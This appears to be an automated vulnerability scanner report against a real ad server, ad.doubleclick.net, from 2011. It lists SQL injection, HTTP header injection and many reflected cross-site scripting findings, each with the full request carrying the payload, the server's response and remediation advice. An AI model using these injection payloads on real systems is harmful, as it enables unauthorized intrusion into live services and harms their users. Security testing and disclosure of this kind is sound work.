var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001'%20and%201%3d2--%20&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%
...[SNIP]...

1.7. http://ad.doubleclick.net/adi/N4581.811.CBSPUBLISHER/B2336781 [sz parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N4581.811.CBSPUBLISHER/B2336781

Issue detail

The sz parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the sz parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185'%20and%201%3d1--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 1

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:00:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 5555

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 13,901 Template Name = Banner Creative (Flash) - In Page Multiples - [DFA] -->
<!-- Copyright 2006 DoubleClick Inc., All rights reserved. --><script src="http://s0.2mdn.net/879366/flashwrite_1_2.js"></script>
<SCRIPT LANGUAGE="JavaScript">
<!--
function DCFlash(id,pVM){
var swf = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.swf";
var gif = "http://s0.2mdn.net/1435575/1-Promotions_0211-1231_Branding-14MillionGeek_300x250.jpg";
var minV = 6;
var FWH = ' width="300" height="250" ';
var url = escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=13185'%20and%201%3d1--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://www.newegg.com?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-14MillionGeeks-_-NA-_-NA");
var wmode = "opaque";
var bg = "same as SWF";
var dcallowscriptaccess = "never";

var openWindow = "false";
var winW = 600;
var winH = 400;
var winL = 0;
var winT = 0;

var moviePath=swf.substring(0,swf.lastIndexOf("/"));
var sm=new Array();
sm[1] = "";
sm[2] = "";
sm[3] = "";
sm[4] = "";
sm[5] = "";

var ct=new Array();
ct[0]="";if(ct[0].substr(0,4)!="http"){ct[0]="";}
ct[1] = "";
ct[2] = "";
ct[3] = "";
ct[4] = "";
ct[5] = "";
ct[6] = "";
ct[7] = "";
ct[8] = "";
ct[9] = "";
ct[10] = "";

var fv='"clickTag='+url+'&clickTAG='+url+'&clicktag='+url+'&moviePath='+moviePath+'/'+'&moviepath='+moviePath+'/';
for(i=1;i<sm.length;i++){if(sm[i]!=""){fv+="&submovie"+i+"="+escape(sm[i]);}}
for(i=1;i<ct.length;i++){if(ct[i]!=""){if(ct[i].indexOf("http")==0){x=escape("http://ad.doubleclick.net/click%3Bh%3Dv8/3af6/17/11f/%2a/n%3B239957816%3B0-0%3B0%3B61055221%3B4307-300/250%3B40719066/40736853/1%3B%3B%7Esscs%3D
...[SNIP]...

Request 2

GET /adi/N4581.811.CBSPUBLISHER/B2336781;sz=300x250;click0=http://adlog.com.com/adlog/e/r=13185'%20and%201%3d2--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/;ord=2011.04.27.21.56.00? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.metacritic.com/games/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response 2

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 22:00:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 845

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3af6/14/11f/%2a/v;240427355;0-0;0;61055221;4307-300/250;41883579/41901366/1;;~sscs=%3fhttp://adlog.com.com/adlog/e/r=13185'%20and%201%3d2--%20&sg=506741&o=12457%253A&h=cn&p=&b=21&l=&site=50&pt=2001&nd=12457&pid=&cid=&pp=100&e=&rqid=01c13-ad-e2:4DB7F9EEA10D5E&orh=&oepartner=&epartner=&ppartner=&pdom=&cpnmodule=&count=&ra=173.193.214.243&pg=&t=2011.04.27.21.56.00&event=58/http://promotions.newegg.com/nepro/11-1111/index.html?nm_mc=ExtBanner&cm_mmc=BAC-CBSBrand-_-10off50-_-0426-_-0427"><img src="http://s0.2mdn.net/viewad/1435575/Promotions_0426-0427_Branding-10off50_300x250.jpg" border=0 alt="Click here to find out more!"></a></body></html>

2. HTTP header injection

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /dot.gif

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload cb557%0d%0a32406b19dfe was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

Request

GET /dot.gifcb557%0d%0a32406b19dfe?2011.04.27.23.14.45 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/dot.gifcb557
32406b19dfe
:
Date: Wed, 27 Apr 2011 23:15:24 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3. Cross-site scripting (reflected)
There are 452 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


3.1. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the b request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c6c9c"-alert(1)-"edfe4a4f26d was submitted in the b parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59c6c9c"-alert(1)-"edfe4a4f26d&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:18 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4872

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
236574810%3B0-0%3B0%3B60245620%3B4307-300/250%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59c6c9c"-alert(1)-"edfe4a4f26d&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=T
...[SNIP]...

3.2. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [cid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the cid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4c6f"-alert(1)-"ed7ce2bf638 was submitted in the cid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=f4c6f"-alert(1)-"ed7ce2bf638&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:22 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
0%3B41415177/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=f4c6f"-alert(1)-"ed7ce2bf638&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&eve
...[SNIP]...

3.3. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [count parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the count request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce68e"-alert(1)-"d288f6ef5a2 was submitted in the count parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=ce68e"-alert(1)-"d288f6ef5a2&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:08 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=ce68e"-alert(1)-"d288f6ef5a2&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Media_201
...[SNIP]...

3.4. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [cpnmodule parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the cpnmodule request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 80897"-alert(1)-"d0bb0cf4d58 was submitted in the cpnmodule parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=80897"-alert(1)-"d0bb0cf4d58&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:21:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4878

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
72%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=80897"-alert(1)-"d0bb0cf4d58&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http://content.dove.us/mencare/Products.aspx?utm_source=CBSSPORTS&utm_medium=traditional&utm_campaign=DMC_Deo_Product_Me
...[SNIP]...

3.5. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [e parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the e request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa51d"-alert(1)-"1d6c11e2fec was submitted in the e parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=aa51d"-alert(1)-"1d6c11e2fec&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:20:44 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 4873

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Template Id = 15,272 Template Name = Banner Creative (Flash) - In Page
...[SNIP]...
77/41432964/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs507108%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=aa51d"-alert(1)-"1d6c11e2fec&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/http
...[SNIP]...

3.6. http://ad.doubleclick.net/adi/N1243.TurnerNetwork/B5268151.18 [epartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N1243.TurnerNetwork/B5268151.18

Issue detail

The value of the epartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b9c36"-alert(1)-"b25cda93eb9 was submitted in the epartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N1243.TurnerNetwork/B5268151.18;sz=300x250;pc=cbs507108;click0=http://adlog.com.com/adlog/e/r=16047&sg=507108&o=22072%253a22408%253a&h=cn&p=2&b=59&l=en_US&site=175&pt=2001&nd=22408&pid=&cid=&pp=100&e=&rqid=01phx1-ad-e24:4DB8592938412&orh=cbssports.com&oepartner=&epartner=b9c36"-alert(1)-"b25cda93eb9&ppartner=&pdom=www.cbssports.com&cpnmodule=&count=&ra=173.193.214.243&pg=Tbij-wq0GW4AAGTpQ08&t=2011.04.27.23.17.21&event=58/;ord=2011.04.27.23.17.21? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.cbssports.com/ads/local-page.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
